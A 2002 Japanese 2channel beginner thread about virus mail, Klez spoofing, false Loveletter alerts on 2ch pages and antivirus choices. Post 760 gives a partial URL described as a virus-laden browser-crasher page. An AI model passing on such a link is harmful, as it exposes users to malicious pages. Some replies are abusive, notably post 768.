>>603 動作環境を参照して、メモリをチェック。
あまりにも遅いんだったら。
>>606 これがオークションに置ける合法的な詐欺ですわ。
614 :
ひよこ名無しさん :02/07/11 00:21 ID:hETZbdX0
VIP CLICK!!っていったい何なの? 知らない間にデスクトップに出現したんだけど。 こういうのはやっぱ開けない方が良いんだろうね。 ウイルススキャンしたら何も感染してませんってなってたんだけど…。
IE6ならば、どのウィルスでも プレビューもしくは開いただけでは感染しないということですか?
>>617 建前ではね…
でも過信しない方がいいと思われ。
619 :
617 :02/07/11 02:22 ID:???
>618 そうなんですか… 誰だかわからないけど、学校で配布されたアカウント名義で 「添付あり&件名が英語」のメールが来てるんです。
>>619 その件名見て、自分と明らかに関係なければ読まずにゴミ箱行き。
どのみちプレビューは切っておいた方がイイよ。
Outlook Expressなんてメーラー使わないことも推奨。
621 :
617 :02/07/11 02:31 ID:???
たとえばポストペットやプ〜さんメールなんかを使っても Outlook ExpressやOutlookを使うよりマシなんですか?
623 :
ナナ :02/07/11 02:38 ID:CabexJt2
ウイルスが毎日のように日に2通も来たんですが、 誰かが故意に送ってるんでしょうか?
624 :
617 :02/07/11 02:40 ID:???
リンクありがとうございます。 今からじっくり読みたいと思います。
>>623 普通。
メールでやり取りする人が多かったり、自分のサイトでメールアドレス晒してると、そんなもの。
626 :
ナナ :02/07/11 02:43 ID:CabexJt2
>>625 そうですか、レス有り難う御座います。
なんか安心しました。
毎日のようにウイルスが来るので
誰かの悪戯かなと思って怖かったです。
有り難う御座います
>>623 故意に?そんなもんいちいちアドレス1つずつ
指定して送るわけ無いじゃん。
貴方のmailアドレス知ってる人にうらみ買ってるなら別だけど
628 :
:02/07/11 03:46 ID:???
629 :
:02/07/11 04:03 ID:???
>>628 「行け」とはなんだ? 尊大な態度をとるな。バカのくせに。
>>629 尊大な態度をとるな。バカのくせに。
尊大な態度をとるな。バカのくせに。
尊大な態度をとるな。バカのくせに。
尊大な態度をとるな。バカのくせに。
尊大な態度をとるな。バカのくせに。
632 :
ひよこ名無しさん :02/07/11 12:50 ID:rqfUfBWq
1ヶ月ほど前から頻繁に同一人物と思われる相手からウィルスが届いています。 送信者は毎回違うのですがReturn-Pathが同じメールアドレスです。 その相手とは一度メールの交換をしています。 メールサイズは120から130KBぐらい。 添付ファイルがあり、本文は<iframe src=>が使用されています。 クレズウィルスのようなので 2回警告メールを送ったのですが、なしのつぶてです。 読んだら返事をくださいと書いてみたのですが返事ももらえず ウィルスも止まりません。 Return-Pathが同じだったらその相手が感染していると思って間違いないのでしょうか? もし違っていたら申し訳ないと思って頻繁にメールをおくるのをためらっています。 非常に迷惑なのでなんとかしたいのですが こういう場合いったいどうするのが一番いいのでしょうか? ガマンして削除続けるしかないのでしょうか? (今はベッキーでメールサーバから削除で対処してます) よろしくお願いします。
634 :
ひよこ名無しさん :02/07/11 12:54 ID:rqfUfBWq
>>633 毎回送信者が違うのですが、できますか?
>>634 ならば無理。
元を断たねば。メールでしつこくウィルスチェックを促しましょう。
どうしてもならメアドを変えてみる。
636 :
ひよこ名無しさん :02/07/11 13:03 ID:rqfUfBWq
>>635 であるから、本当にそやつが感染しているのかどうか自信がないのです。
ゴルァ!!メールを送ろうにもReturn-Pathまで偽装するという話も聞いたことがあるので・・・
(真偽はわかりませんが)
それでその真偽をお伺いしたいのですが・・・
638 :
ひよこ名無しさん :02/07/11 13:07 ID:rqfUfBWq
>>637 ヘッダを偽装するのは知っています。
だから送信者が毎回違うのも当然だと思うのですが
Return-Pathのメアドがほぼ毎回一緒なんです。
639 :
ひよこ名無しさん :02/07/11 13:09 ID:rqfUfBWq
もっと噛み砕いて質問します。 クレズウィルスが届くのですが、ヘッダを偽装するクレズウィルスの場合 大元の送信者を調べるにはどこを調べればいいのでしょうか? Return-Pathまで偽装するというのは本当でしょうか?
>>638 リメーラーを使った嫌がらせの時もあるかも。
>>636 大元を調べるのは無理に近い。
相手がやる気ならなおさら。そうじゃなくてもかなり不可能。
Return-Pathまで偽装する亜種もあったような記憶があるので検索してみては。
642 :
ひよこ名無しさん :02/07/11 13:24 ID:rqfUfBWq
>>640 リメーラーを使った形跡はありません。
>>641 Return-Pathはほぼ毎回同じなんですが
同じアドレスに偽装されているとしても当の本人から返事もこないんですよね。
身に覚えが無いとしたら何らかのリアクションがあると思うんですが・・・
あと、今思いついたんですが、とりあえずその人のメアドとプロバイダはわかってるので
プロバイダの方にお願いしてみるということは可能でしょうか?
確かそんな記事を見かけたような記憶が・・・
>>642 そこまでは分らない。プロバイダに聞いてください。
644 :
ひよこ名無しさん :02/07/11 13:41 ID:rqfUfBWq
>>643 ググルで色々調べているんですが、どうやら最終的にはプロバイダに聞いてみるしか手がなさそうです。
とりあえずもう一度送信者と思わしき人物にコンタクトを取ってみて
それでも無視されたら、プロバイダに働きかけてみようと思います。
色々とありがとうございました。
646 :
ひよこ名無しさん :02/07/11 18:28 ID:ysYMuGLq
すみません、ウイルスかどうかも分からないんですが、いつの間にか windowsフォルダの中に長い名前の見知らぬファイルが複数出来ているんです。 ff003311_{62225D20-8159-11D6-B136-00A0B02989E2}.tmp という様な。 全てTMPファイルで0バイトなんで無視しようかとも思ったんですが、気が付くと ローカルディスクの空き容量が減っているので削除したのに、いつの間にかまた 出来ているんです。 win98、NIS2002を入れてありウイルス定義は最新のもので毎週スキャンしています。 ウイルスは検出されません。宜しく御願いします。
647 :
ひよこ名無しさん :02/07/11 18:39 ID:sc4yLfZc
ノートンでウイルススキャンしたら、 VBS.LOVELETTERというのが検出されて、 「修復できませんでした」となってしまいました。 どうしたらよいのでしょうか? また、どんな被害があるのでしょうか? 教えてください。よろしくお願いします。
>>647 上を読まんのか?488あたりを読め!あわてモンが
649 :
647 :02/07/11 18:52 ID:sc4yLfZc
>>648 焦ってたんで…一番最初のテンプレしか読まなかったです。
申し訳ない。そして、誘導してくれてありがとうございました。
ちなみにその際、ノートンで「検疫」というのを
実行してしまったのですが大丈夫なのでしょうか?
>>649 ああ、かまわん!コレは「ウイルス」なんかじゃない。必要なければ
削除してしまえば?
651 :
647 :02/07/11 19:00 ID:sc4yLfZc
>>650 してしまいます!
ありがとうございました。お世話になりました。
653 :
ひよこ名無しさん :02/07/11 23:11 ID:io2WNnxv
>>654 ごめんなさい・・・
これからもお答えマン頑張ってください
>>655 いいえ、ま、ノートンの過剰反応ですからね。
657 :
ひよこ名無しさん :02/07/12 00:37 ID:jy81QEFQ
何のウィルスかを調べるにはどこを見たら良いのですか? 続けて2通来まして「Return path」は同じですが「From」が両方共違います。 この3件のアドレスには全く心当たりはありません。 KLEZかと思って調べた所、添付ファイルが.txtと.htmだった為 どうも違うと思って、幾つか流行のヤツ見たんだけど判らないのですが。 1件目のタイトルは「United States of America, local law may apply.」 添付は「LISENCE TEXT.txt」 2件目のタイトルは「A special good tool」で添付は.htmでした。 一目見てあやしいので削除してオンラインスキャンした所 大丈夫でしたがこれってウィルスですよね? 又、発信元を突き詰めるのはどうしたら良いのでしょう?
Return pathが発信元だよ Return pathに書いてあるメアドのプロバイダにコピー送れ
660 :
ひよこ名無しさん :02/07/12 02:26 ID:3KI7XuwL
突然パソコンの処理速度が遅くなってメモリ不足が出て、
パソコンが全く動かなくなってしまいました。
再起動させてCtrl+Alt+Deleteを押したら
「Wscript」というアプリ(?)が二つくらいありました。
数分後に見たらその「Wscript」が10個くらいに増えていました。
消しても消しても消えません。
「Wscript」でグーグル検索したら、
http://www.symantec.com/region/jp/sarcj/data/w/wscript.kakworm.html というウィルスが紹介されていたのですがもしかしてこれでしょうか?
>Wscript.KakWormは、Microsoft Outlook Expressを使用して感染を広げます。
と書いてありますが、Outlookは一切使用しておりません。
思いあたることと言えば音楽ファイルをダウンロードしたくらいです。
教えて下さいお願いします・・・
>>660 >音楽ファイルを・・・
エムエクースか?
>>661 KaZaAというファイル共有ソフトです。
663 :
:02/07/12 02:48 ID:???
665 :
660 :02/07/12 03:15 ID:???
>>664 まさしくそれ以外の何者でもありません。
ありがとうございました!!がんばってみます!!!
先生!2ちゃんのスレをかちゅーしゃで見ていたら ノートンさんが反応して 「ウィルスを検出しました。アクセスできません」 と出たのですが、そういう事はありえるのでしょうか?
>>667-668 すみません、vbsというのがなんなのか
わからなかったので見てませんでした。
エムエクースしながらやってたので、一瞬焦りました。
とりあえず大丈夫みたいですね。
>>669 ああ、MX経由か・・・ウイルスソフとかっておいで。
>>669 全然問題ない。それよりかMXの方が問題
673 :
age :02/07/12 17:37 ID:???
あげ
676 :
ひよこ名無しさん :02/07/12 21:36 ID:Fma3ET/W
聞いてください。今ウイルススキャンしたら vbs.loveletter.verっていうウイルスが発見されました。 ノートンのメッセージによると修復できないらしいのです どうすればいいのですか?・゚・(つД`)・゚・ワァァァァ
>>676 お前、なんで4つ前の添付レス他読まないんですか?
679 :
モウ!! :02/07/12 22:55 ID:QOwnZOxN
助けてください。 いきなり「VBS,LOVELetter,A]が検出されました とかでてきたのです。 どうしたらよいでしょうか?
682 :
モウ!! :02/07/12 23:00 ID:QOwnZOxN
ご認知ではないと思います。 ノートン先生を、起動させてみたら、「感染が見つかりました。」 ってでてきたんですよ
>>682 だから、その488くらいを読んでみろ!
684 :
◆lfOfjFVA :02/07/12 23:03 ID:Gd/0FYJ3
Windows Meの場合 次のメッセージが画面上に表示されます。 このプログラムは、MS-DOS モード(リアル モード)で実行されるため、このバージョンのWindowsでは実行できません。 MS-DOS ウインドウでこのプログラムを実行する方法は次のとおりです: プログラムのアイコンをマウスの右ボタンでクリックし、[プロパティ]をクリックし、[OK]をクリックして、表示されるダイアログで[はい]をクリックします。プログラムが再起動します。 または製造元に問い合わせて、更新されたバージョンを入手します。 [OK]をクリックします。 Windows Meの起動ディスクを使用し、フロッピーディスクから起動します。 コマンドプロンプト状態で、以下のコマンドを入力します。 C: CD \VB VBSCAN /V /A /C ウイルスチェックが開始されます。 発見された「PE_MTX.A」はただちに自動的に駆除が行われます。 ここでの処理は、お使いのハードディスクの容量やファイルの数などにより、数分から数時間を要します。 すべての処理が完了すると、画面表示の変化がなくなり、プロンプト状態に戻ります。 フロッピーディスクを抜き、コンピュータを再起動します。 以上により、PE_MTX.Aの駆除が完了です。 ↑あまりよく分かりません。コマンドプロンプトってなんですか?詳しく教えて下さい。
パソコンの電源入れた後数分すると急に電源が落ちるウイルスてありますか win2000でログイン画面のまま数分放置すると電源が落ちているのですが
>>685 何でもウイルスウイルスウイルスウイルスウイルスウイルスウイルスウイルスウイルスウイルスウイルスウイルスウイルス
ウイルスウイルスウイルスウイルスウイルスウイルスウイルスウイルスウイルス
ウイルスウイルスウイルスウイルスウイルスウイルスウイルスウイルスウイルス
ウイルスウイルスウイルスウイルスウイルスウイルスウイルスウイルスウイルスウイルスウイルス
ウイルスウイルスウイルスウイルスウイルスウイルスウイルスウイルスウイルス
のせいか。めでたいな。
>>省電力は変えてないと思います。 昨日から突然なりました。さっきから 電源落ちてはコンセント入れなおして 再起動なんてばっかりやってます。
>>684 MS-DOSモードの画面のこと。
アクセサリー→システムツールとかにある。
黒い画面が出て
C:\>
と言うような表示が出ている状態。
690 :
ひよこ名無しさん :02/07/12 23:44 ID:/PHdZ3GZ
携帯電話が感染ていうのはありますでしょうか? チェーンメールで送られてきて下のカーソルが効かなくなってしまいました。
>>690 電源切って、バッテリーはずして、もう一度やりなおしたら?
692 :
684 :02/07/12 23:57 ID:cgHAIvFX
>>689 ∧_∧
(;´Д`)<わかりました。ありがとうございます。
693 :
ひよこ名無しさん :02/07/13 00:02 ID:YrbvP6tW
KING-SIZE PIGっていうのに感染しちゃったみたいなんですけど 除去ツールとかあれば教えていただけないでしょうか。
695 :
646 :02/07/13 00:11 ID:cd+882Rl
>>674 ウイルスではなかったんですね…良かった。早速実行してみます。
ありがとうございました!
696 :
ひよこ名無しさん :02/07/13 00:12 ID:HKtdBILD
件名:Let's be friends 本文:なし 添付:Re_19.06.2002.scr Re_19.06.2002.txt っていうメールが見知らぬ外人から送られてきたんだけど ウイルスは検出されませんでした。 コレって何?
>>696 オンラインスキャンで検出されませんでした、ってのだけは勘弁。
あれは添付ファイルのスキャンに制約があるから。
IEは5.5SP2以上に・・・
そのノートンの誤作動のことなんですけど、 2ch見てて毎回警告文が出るたびに削除してるんですが、 いちいち警告文ださないためには 削除しないでおいたほうがいいんですかね?
701 :
ひよこ名無しさん :02/07/13 03:10 ID:JhNx7vaM
て
702 :
700 :02/07/13 03:14 ID:???
(ノ゚o゚)ノ オシエテー(^o^)
>>700 かちゅ等で見るようにして該当フォルダをノートンで除外設定
かちゅだとlogフォルダだね
ウイルスでしょうか・・・?
706 :
age :02/07/13 10:28 ID:???
707 :
700 :02/07/13 12:39 ID:???
>>703 今までIEで閲覧するのに不自由なかったので、
あえてかちゅは使ってませんでしたが、これを機会に使ってみようかと思います。
ありがとうございました!
PE_ELKERN.Dというウイルスが検出されて検索したのですが ひっかかりませんでした どんなウイルスか分かる方いらっしゃらないでしょうか?
ウィルスや不正アクセスに対応するためにウィルス対策ソフトを購入しようと思い家電屋に見にいきましたが、 トレンドマイクロの「ウィルスバスター」とシマンテックの「Internet Security」のどちらにしようかと迷ってしまいました。 どちらが良いかアドバイスをいただけませんでしょうか。
>>710 どっちでもいいよ。漏れはノートンだけどさ
712 :
ひよこ名無しさん :02/07/13 22:22 ID:fZLbPrf+
WinMeでNIS2002使ってるんだけど、今日パソコン起動したらパーソナルファイヤ ウォールのアイコンがタスクトレイから消えてました。 画面右下の、何かあったときデロンと飛び出す奴も消えてました。 デスクトップのアイコンは消えてなかったのでWクリックしてみましたが、起動し てくれません。 あと、フォルダを開いたり等の操作もえらく反応が鈍くなってます。 どうにか立ち上がったアンチウィルスで完全スキャンしてみましたが、何も検出さ れません。スキャンディスクをかけてみても異常なしです。再起動かけても症状は 同じです。 前回終了時にフリーズしたのでスイッチを切って強制終了してしまったことぐらい しか身に覚えがありません。どうなってしまったのでしょうか?
>>712 強制終了のせいでスタートアップ関連が死んだかな?
ちょっと良く分からんが。
クラスタスキャンで不良セクタ出来てない?
714 :
ひよこ名無しさん :02/07/13 22:39 ID:fZLbPrf+
>713 レスありがとうございます。クラスタスキャンやってみます。
715 :
ひよこ名無しさん :02/07/13 22:43 ID:h8+yUFOs
なんかファイルを実行したらファイル全削除されました・・・ どうすれば・・・ 今はネットカフェです・・・
717 :
ひよこ名無しさん :02/07/13 22:45 ID:h8+yUFOs
>>716 ウイルス名がわからないんです・・・
ファイル名はマンキン.exe
>>717 マンキン・・・じゃ、OS再インストールしかないね。
720 :
ひよこ名無しさん :02/07/13 22:50 ID:h8+yUFOs
マジですか・・・ 対策法は・・・ つーかウイルスバスターひっかかんないんですけど
722 :
ひよこ名無しさん :02/07/13 22:57 ID:h8+yUFOs
結局なんていうウイルスなんですか?
定義ファイルが古い
>>720 てーか、「ウイルス定義」の更新してたの?
727 :
ひよこ名無しさん :02/07/13 23:00 ID:h8+yUFOs
UFOの襲来か。 なるほど宇宙人のツラみたいに珍奇な質問をしやがる。
729 :
ひよこ名無しさん :02/07/13 23:04 ID:h8+yUFOs
ボクハドウスレバイインデスカ
サイキドウハマダシテマセン
タスケテ
ニイタカタマノボレ
>>728
ノートン大先生のマンキン.exeの分析結果 ファイルを分析しました。送られたそれぞれのファイルについてわかったことを 以下に報告します。 ファイル名 マンキン.exe : 結果 : デベロッパーノートを参照してください。 デベロッパーノート : %s Our automated system has performed an extensive analysis on the file(s) that you have submitted and found no evidence of malicious code. If you have additional evidence to suggest that a malicious program still resides in the file that was submitted to us, please contact Symantec Technical Support for assistance.
シマンテックの自動応答システムでは、感染活動の有無を判断してるんではなかろか? このスレのいくつか前でも、実行すると全消去のexeファイルがリンクされてたので送ったら、 結果は「悪意があるコードを見つけませんでした」とのこと。 単なるファイル削除プログラムは相手にしてくれないっぽい。 確かにウイルスではないので当然と言えば当然かも知らんですが。
733 :
ひよこ名無しさん :02/07/14 03:25 ID:IJDNc31z
知り合いから「きみの名前で携帯電話にワケのわからない メールが送られてきた」と連絡があったので、送ってないと返事をして パソコンのメールをチェックするとWORM_KLEZ.Hが添付されている メールが知らないアドレスとその知り合いのアドレスから届きました。 ウィルスバスターが反応してくれたので、すぐに削除しました。 詳しい方、今後の対策の知恵を貸して頂けませんか? お願いします。
>>733 あなたのメールアドレスを登録している人がKlezに感染して、
その人がKlezつきメールをばら撒いてる可能性が大。
要はFromを詐称されたわけです。
ウイルスバスターの定義ファイルを常に最新に保ち、定期的にスキャン。
736 :
霞拳志郎 :02/07/14 03:37 ID:dRikaBKM
737 :
ひよこ名無しさん :02/07/14 03:42 ID:IJDNc31z
738 :
霞拳志郎 :02/07/14 03:43 ID:dRikaBKM
739 :
712です。 :02/07/14 10:03 ID:FcNnR3Ff
>713 セーフモードにしてスキャンしましたが、クラスタ異常なし。念のためにデフ ラグして最適化の後、もう一度アンチウィルス(7/10更新)で完全スキャンし ましたが、ウィルス検出されず。でも症状は改善されません。インストしてあ るゲームなんかも一応立ち上がりますが非常に重くてプレイしづらいです。 あと、微妙にスレ違いなネタでした。スマソ。ウィルスの仕業と決まったわけ でもないのですから。
>739 ノートンシステムワークス自体がOSを不安定にしたり OSを重くしたりすることがあることを知ってる? 一度アンインストールしてみては?
741 :
712です。 :02/07/14 10:30 ID:FcNnR3Ff
>740 レスありがとうございます。 システムワークスではなく、インターネットセキュリティ2002を入れて ます。
742 :
740 :02/07/14 10:35 ID:???
>741 NSWでなくNISだったね。すまなかった Norton先生は全般的に>740の傾向がある アンチウィルスでウィルス反応が無いなら安心できるのでは? 再インストール時の再設定をする手間が面倒でなければ 一度アンインストールしてみては?
743 :
712です。 :02/07/14 10:47 ID:FcNnR3Ff
>742 なるほど、全般的にその傾向があるのですか。 今日は日曜ですから、じっくりアンインスト→再インストやってみます。 ありがとうございました。
744 :
ひよこ名無しさん :02/07/14 11:47 ID:b++DOBr0
ある日、起動した途端に青いエラー画面が出て、何度やってもエラー画面になって起動すらできないので セーフモードでMcAfee VirusScan for Windows 95 and Windows 98の機能を全て無効にして再起動したところ何の問題もなく起動できました。 後日McAfee VirusScanを有効にして起動してもまたエラー画面が出るのですが、どんな対処法があるのか、どなたかご教授おねがいします。
746 :
744 :02/07/14 11:54 ID:???
ウイルススキャンができないのは痛いですとても
>746 マフィーを切ると問題なく起動できるんでしょ だったらマカフィーが原因と考えられる マカフィーを一度アンインストールして、再起動して マカフィーを再度インストールしてみてはどうでしょう もし他の原因があると考えているなら あなたのPCの環境、その問題が起きる直前にPCにしたことを全部書いてください。
748 :
ひよこ名無しさん :02/07/14 11:59 ID:PFwxhzDh
質問です。 あるスレにVBS-LOVELETTERウィルスの中身を書いたヤシがいるのだが、 これは犯罪?ファイルにして実行しなければ無害らしいが、脳トンとかが誤作動するらしい。 削除依頼は出しておいたけど、通報した方がいいのかな?詳しい人の見解きぼんぬ。
749 :
744 :02/07/14 12:01 ID:???
わかりました、マカフィーを再インストールしてみます。 どうもありがとうございました。
750 :
748 :02/07/14 12:07 ID:???
少し前のレスで既出みたいですねスマソ。
あげ
age
756 :
ひよこ名無しさん :02/07/14 20:46 ID:/FjklBQo
McAfee VirusScanってやつでウイルススキャンのアップデートしようとしたら error getting checksum for file 'e:\ecompull|dl\VSC\JPN\UPDATES4203.EXE' というのが状況の欄に出てきてアップデート出来ませんでした。解決策を教えていただけないでしょうか よろしくお願いします。
>>756 チェックサムが間違っているなら、ダウンロードのエラーだろう。
該当のファイルを消して、やり直しても同じか?
>>756 McAfeeは非常に評判が悪いので、この際買い換えてはどうかと。
760 :
:02/07/14 21:04 ID:g3RiK7eV
↓のアドレスを踏んでしまいました。 ://dms100.org/worksucks 踏んだ後、ウイルスを仕込んだブラクラと教えてもらいましたが。 McAfeeスキャンしたけどハードディスク大丈夫でした。 ですが心配です。 このウイルスはどんな影響があり、駆除はどうすればよいでしょうか?
>>760 インターネット一時ファイル削除。あとはウイルススキャン。
マカフィーなんて使うなよ。
>>760 踏んだ直後にMcAfeeが反応してないのか?
本当に教えられた通りウイルスならMcAfeeが即座に反応するはずだが?
反応していればどんなウイルスを検出したか分かってるはずだが?
McAfeeで使ってるウイルスパターンの日付を書いてみろ。
763 :
760 :02/07/14 21:51 ID:g3RiK7eV
よく解らなかったのでトレンドMのオンラインスキャンで検索した結果 4つでてきました。 ウイルス ファイル JS_WINDOWBOMB.E C:\WINDOWSTENP… JS_EXCEPTION.GEN C:\WINDOWSTenp… JS_SEEKER.W C:\WINDOWSTenp… JS_SEEKER.A C:\WINDOWSremoveit.hte すいません対策を教えていただければ助かります。 この4つのファイルの削除だけでよろしいでしょうか?
764 :
760訂正 :02/07/14 21:52 ID:g3RiK7eV
よく解らなかったのでトレンドMのオンラインスキャンで検索した結果 4つでてきました。 ウイルス ファイル JS_WINDOWBOMB.E C:\WINDOWSTENP… JS_EXCEPTION.GEN C:\WINDOWSTenp… JS_SEEKER.W C:\WINDOWSTenp… JS_SEEKER.A C:\WINDOWSremoveit.hte すいません対策を教えていただければ助かります。 この4つのファイルの削除だけでよろしいでしょうか?
>>764 ウイルス対策ソフトを買え!オンラインは「目安」でしかない。
ウイルス対策せずにネットするなんて、アフォですよ!
>>764 トレンドマイクロホームページにウイルスデータベースがあるから勝手に調べろ
>>764 あなたが閲覧に使用したブラウザの種類や設定の内容、WidowsUpdate
しているかどうかなどによる。
しかし、ホントに居るんだよな。ウイルス対策しないヤツ。
>>760 みたいに。
このスレ見るようになるまで、まさかそんなヤツがいるとは・・・。
1人2人くらいはそういうヴァカがいるかもしれないとは思ったけど、
まさかこんなに多いとはね。
非常識っつーか無責任っつーか、ヴァカだよヴァカ。
こういう馬鹿男・馬鹿女が、馬鹿女・馬鹿男とセクースしまくって子供ぽこぽこ産んでさ、
そうやって日本は馬鹿で埋め尽くされていくんだろうね。そう思うと鬱だよ・・・。
じゃあ俺もその内の一人だな
>>771 ジサクジエーンがバレた香具師に限ってそう書くよ(w
>>773 全然、違うんだけど。何、深読みしてんだか?
775 :
760 :02/07/14 22:42 ID:g3RiK7eV
2chで罵倒は慣れていますし、今回も放置しようと思いましたが、
>>769 さんの様に、見ず知らずの人に援護射撃をしてもらうと
あらためて2chも悪くないなと思ってしまいます。
まあ、768の意見にも一理あるので、
この機会にウイルス対策を検討します。
このレスも768にとってはジサクジエーンなのかなw
777 :
ひよこ名無しさん :02/07/14 23:29 ID:yxWeRqR1
セキュリティ板のどこかを踏んだら、ノートンがVBS.Freelink.B ってやつを検出したと警告してきました。誤作動でしょうか? とりあえずスキャンして当たれば削除しようとおもいます。
>>777 激しく既出。このスレをよ〜〜〜く読みなおせ!
780 :
ひよこ名無しさん :02/07/14 23:39 ID:rUS5ylBv
送信者”news” 件名”congratulations”という添付ファイル付きの
メールを受信しました。プロパティを見たら
Return-Path: <
[email protected] >
Received: from smtp.asahi-it.com (smtp01.asahi-it.com [210.174.168.200])
Received: from Yijsbua (CBCba-185p121.ppp13.odn.ad.jp [218.46.77.121])
Message-Id: <
[email protected] >
From: news <
[email protected] >
Subject: Congratulations
これはウィルスメールでしょうか?
全然、しらないアドレスです。
Outlook で開封はしていませんが、プレビューしただけでも
ダメですか? お願いします!
>>780 何故自分でチェックしないんだ?
他人のメアドまで晒して・・・削除依頼出しとけよ。
783 :
ひよこ名無しさん :02/07/14 23:50 ID:4hKLWz1t
なんでもベスト店のアンチウイルスソフトで AVG(Grisoft)[6]というのが一位になっているのですが、 本当にいいソフトなのでしょうか? このスレを検索しても出てこないのですが。 ご存知の方、お使いの方、いらっしゃいましたら教えてください。 ちなみに現在はノートンアンチウイルスを使用しています。
>>783 サーチエンジンで検索すれば一発で出てくる。
>>783 別に乗り換えるほどのもんでもないと思いますが。
786 :
ひよこ名無しさん :02/07/14 23:59 ID:nF14rOKW
Hotmailをブラウザで利用しています。 IE6.0、ノートンアンチウイルス(リアルタイムアップデート)を使用しています。 最近、 ・メールのサイズが120k〜130kもあるのに添付ファイルがない ・タイトルが英文 ・本文には何も書かれていない というメールが頻繁に届きます。 何回か開いてしまいました。 システムの完全スキャンをしても何も感染してないそうですが、 あまりにも怪しいメールのため気になります。 ウイルスメールなのでしょうか?
787 :
660 :02/07/15 00:16 ID:???
>>664 オソレスですが・・・
駆除ツールがそのサイトのリンク先にあったので
ウィルス駆除できました(´Д⊂
本当にありがとうございました!!
>>781 ウィルスでしょうか? 捨てます。ありがと!
>>782 本当に初心者なので送信者のメルアドさらしてたの知りませんでした。
自分で調べられないからココに来たんです。
>>780 その情報だけでウィルスかどうかなんてわかりっこないが。
791 :
ひよこ名無しさん :02/07/15 00:53 ID:nEoaFeyb
今、携帯からここを見ています…とうとう、ウィルス感染を 経験してしまいました。大ショックです。 パソコン歴がここ数ヶ月で、ネットサーフィンとメールの やりとり位しかしていない私でも、何とかウィルス駆除できるでしょうか? 今、ウィルスチェックが終わって、1個の感染ファイルが 見付かりました。 ウィルス名は、VBS.Loveletter.A(;_;)… でした。修復できませんでしたとでています。どうしたらよいでしょうか? 教えてください(;_;)
>>791 このスレの488を見れば、自分の愚かさに
気づくだろう
>>786 > ・メールのサイズが120k〜130kもあるのに添付ファイルがない
添付ファイルの有無をどうやって確認してる?
・タイトルが英文
常識。
・本文には何も書かれていない
白い背景に白い文字で書いてあったりしないか?
794 :
791 :02/07/15 01:19 ID:RFhI3sG6
792さんの書き込みの通り、488読みました。 ・・・・そうだったのですね、気が抜けました。 でも良かったです〜〜 ものすごく慌ててしまったので、携帯の方からいきなり 最新レスの方に飛んでしまったので過去ログ未読でした。 スミマセン! 安心したところで、仕事に戻ります。 792さん、どうもありがとうございました。
795 :
786 :02/07/15 01:22 ID:mO5N6krc
>>793 レスありがとうございます。
>> ・メールのサイズが120k〜130kもあるのに添付ファイルがない
>添付ファイルの有無をどうやって確認してる?
「添付ファイル : 〜〜〜 (〜k) 」
という表示がないことからです。
>・本文には何も書かれていない
>白い背景に白い文字で書いてあったりしないか?
「全てを選択」をしましたが何も書かれていません。
ソースを見たら
<SCRIPT>
<!--
function Filtered()
{
return 0
}
//-->
</SCRIPT>
<FONT></FONT>
<font color=#000000>
とだけ書かれていました。
ノートン>>>>>>>>>>>>>>>>>>>>>>>>>>> >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> バスター>>>>>>>>>>>>>>>>>>>>>>>>>>> >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> >>>>>>>>>>>>>>>>>>クソースネクストバカフィー >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> >>>ウイルス警備隊
こいつもAGE
798 :
ひよこ名無しさん :02/07/15 08:56 ID:DHbJYCTN
朝から海外エロサイト廻っていたら、さっき JS_EXCEPTION.GEN (ホームや検索がエロサイトに飛ばされるやつ)にやられた、、 あ〜、ビックリしたなぁもう。 セキュリティ高なのにウィルスバスターがバチバチと凄いスピードで反応。 あまりの速さに隔離がちゃんと出来ない〜、、、アハハ。 それでも、たった2〜3秒だが、なんとか20個隔離、26個失敗!!(w 当然、ActiveXもJavaも切ってあるのに、こんなの初めてでした。 インターネットオプション開くと、ホームページのアドレス欄に カーソルが走ってるし、、閉じると固まるし、、 まぁ、ファイルの削除で実害は無いと思うのだが、、 確かにJavaは切ってあったのに、、なんだか、気持ち悪ぃ〜です。
>>798 >当然、ActiveXもJavaも切ってあるのに、こんなの初めてでした。
そのウイルス、JavaScriptなんだから上は全然対策になってないかと。
800 :
798 :02/07/15 09:23 ID:DHbJYCTN
、、、スミマセン。 そ、そうなんですか、、今までこんな事無かったもので。 正直、JavaScriptはJavaを切っていれば無効になると思っていました。 それで、あつかましいとは思うのですが、対策はどうすれば良いのですか? そんなサイト見なきゃ良いに決っているのですけど、、、
801 :
ひよこ名無しさん :02/07/15 11:46 ID:XRlLXNMA
Noron Internet Securityかウィルスバスターを買おうと 思っているのですが、 Nortonの方はウィルス定義の更新には、 お金がかかると聞いているのですが、 ウィルスバスターのほうはどうでしょうか?
>>801 1年ごとに更新の為にお金がかかるのは何処も一緒だと思うのですが。
最初の1年は、ソフトの料金に含まれていると。
803 :
801 :02/07/15 12:05 ID:XRlLXNMA
>>802 そうなんですか、わかりました。
ありがとうございました。
804 :
ひよこ名無しさん :02/07/15 13:30 ID:ujj4zPip
現在Norton AntiVirusを使っています。 友人はNoron Internet Securityを使っているのですがしばしば ハッキングツールを使った侵入に遭い、ブロックしているそうです。 こんな話を聞くと不安になるのですが、Internet Securityに乗り換えたほうがいいでしょうか? OSはWindows2000です。
>>804 ぺ氏が載っけてるURLを読めばいいけど、タダでFire wallを構築できるツール
もあるので、それを入れておけば問題ないと思います。
今月のDOS/VSpecialがFire wall特集ですから、一読なさってみては。
808 :
804 :02/07/15 15:21 ID:ujj4zPip
>>805 >>807 なるほど、便利なツールがありますね。導入してみます。
ありがとうございました。
Personal Firewallを買うハメになったら初めからInternet Security
買っときゃよかったって鬱になるところでした。
